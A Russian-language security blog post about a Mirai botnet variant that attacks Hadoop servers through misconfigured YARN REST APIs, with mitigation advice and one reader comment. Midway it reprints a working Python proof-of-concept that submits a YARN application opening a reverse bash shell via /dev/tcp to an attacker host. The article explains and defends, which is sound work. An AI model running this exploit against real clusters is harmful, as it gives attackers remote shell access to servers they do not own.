Ботнет Mirai появился в 2016 году и за короткое время успел заразить более 600 тыс. IoT-устройств. На прошлой неделе стало известно о новой версии Mirai, цель которой — Linux-серверы с Hadoop. Разбираемся, какую уязвимость использует вирус и как её «прикрыть».


/ Flickr / D J Shin / CC BY-SA

Пара слов о Mirai


Mirai стал известен благодаря серии громких атак. Одна была на блог журналиста Брайана Кребса (Brian Krebs) после публикации статьи о продажах услуг ботнетов. Другая — на крупного DNS-провайдера Dyn, что вызвало сбой в работе мировых сервисов: Twitter, Reddit, PayPal, GitHub и многих других.

Для «захвата» IoT-устройств ботнет использовал уязвимость, связанную со слабыми паролями (производители делали их одинаковыми для всех смарт-девайсов). Вредонос мониторил интернет на наличие открытых telnet-портов и вводил перебором известные пары логин-пароль для доступа к учетной записи владельца устройства. В случае успеха гаджет становился частью «вредоносной сети».

В конце 2016 года разработчики выложили исходные коды вируса в сеть. Это привело к появлению ещё нескольких версий зловредного ПО, но все они делали своей целью устройства интернета вещей. До недавнего времени — теперь возник червь Mirai, который атакует Linux-серверы в дата-центрах.

Ботнет «вербует» Linux


Отчет о новой версии Mirai опубликовали специалисты по информационной безопасности компании NETSCOUT. Известно, что ботнет атакует серверы с установленным фреймворком Apache Hadoop. Как говорят специалисты по ИБ, хакеров привлекает мощность железа. Hadoop используется на серверах, занятых высокопроизводительными вычислениями и работой с алгоритмами машинного обучения. Сеть из производительных устройств позволит совершать более разрушительные DDoS-атаки.

Вариант Mirai для Linux по-прежнему взламывает системы путем подбора заводских учетных данных по telnet. Но теперь программе не нужно различать разные виды архитектур IoT-гаджетов, Mirai атакует только серверы с процессорами x86.
При этом новый ботнет не ставит вредоносное ПО на взломанное устройство самостоятельно. Червь отправляет злоумышленникам IP-адрес уязвимой машины и пару логин-пароль для неё. Затем хакеры устанавливают DDoS-ботов вручную.

Какую уязвимость используют


Вредонос использует для проникновения на сервер уязвимость модуля YARN, отвечающего за управление ресурсами кластеров и планирование заданий в Apache Hadoop.

При неверной конфигурации YARN атакующий может получить доступ к внутреннему REST API системы через порты 8088 и 8090. Подключаясь удаленно, злоумышленник получает возможность добавить в кластер новое приложение. К слову, об этой проблеме известно уже несколько лет — на ExploitDB и GitHub опубликованы PoC-эксплоиты.

Например, на GitHub представлен следующий код эксплойта:

#!/usr/bin/env python

import requests

target = 'http://127.0.0.1:8088/'
lhost = '192.168.0.1' # put your local host ip here, and listen at port 9999

url = target + 'ws/v1/cluster/apps/new-application'
resp = requests.post(url)
app_id = resp.json()['application-id']
url = target + 'ws/v1/cluster/apps'
data = {
    'application-id': app_id,
    'application-name': 'get-shell',
    'am-container-spec': {
        'commands': {
            'command': '/bin/bash -i >& /dev/tcp/%s/9999 0>&1' % lhost,
        },
    },
    'application-type': 'YARN',
}
requests.post(url, json=data)

Кроме Mirai, эту уязвимость использует другой DDoS-бот — DemonBot, который обнаружили в октябре специалисты компании Radware. С начала осени они регистрировали более миллиона попыток взлома через уязвимость YARN ежедневно.

Что говорят эксперты


По словам ИБ-специалистов, больше всего попыток взлома пришлось на США, Великобританию, Италию, Германию. На начало месяца уязвимости в YARN были подвержены чуть более тысячи серверов по всему миру. Это не так много, однако все они обладают высокой вычислительной мощностью.

Также есть информация, что уязвимость в Hadoop может предоставить злоумышленникам доступ к данным, которые хранятся на незащищенных серверах. Пока таких случаев зарегистрировано не было, но эксперты предупреждают, что это лишь вопрос времени.

Новый вариант Mirai распространяется не быстро — ежедневно происходит лишь несколько десятков тысяч попыток взломать Hadoop-машины через YARN. Причем все атаки идут с небольшого числа IP-адресов — не более сорока.


/ Flickr / Jelene Morris / CC BY

Такое поведение злоумышленников и натолкнуло специалистов NETSCOUT на мысль, что вирус распространяется не автоматически — хакеры вручную сканируют интернет и внедряют программу на незащищенные машины. Это означает, что у владельцев серверов с установленным Hadoop есть больше времени на закрытие уязвимости.

Для защиты от атаки нужно изменить настройки безопасности сети. Администраторам достаточно ограничить доступ к вычислительному кластеру — настроить IP-фильтры или полностью закрыть сеть от внешних пользователей и приложений.

Чтобы предотвратить неавторизованный доступ к системе, специалисты по безопасности также советуют обновить Hadoop до версии 2.x и включить аутентификацию через протокол Kerberos.



Несколько постов из блога VAS Experts:


Пара свежих материалов из нашего блога на Хабре:

Комментарии (1)


  1. sshikov
    01.12.2018 21:16

    >обновить Hadoop до версии 2.x

    Слабо верится, что на сегодня есть такие, кто все еще живет на версиях более старых. У нас сейчас 2.6, и это уже приличное старье (с тех пор вышло версий пять наверное).

    Ну и самое главное — те, у кого порты Yarn REST торчат наружу неприкрытые ничем — ССЗБ по определению. Ибо Yarn это планировщик задач Hadoop, запуск приложений — это его основное назначение. Это ровно тоже самое, что открыть ssh для доступа без пароля.

    И еще можно Webhdfs открыть, совсем уж для полноты картины :)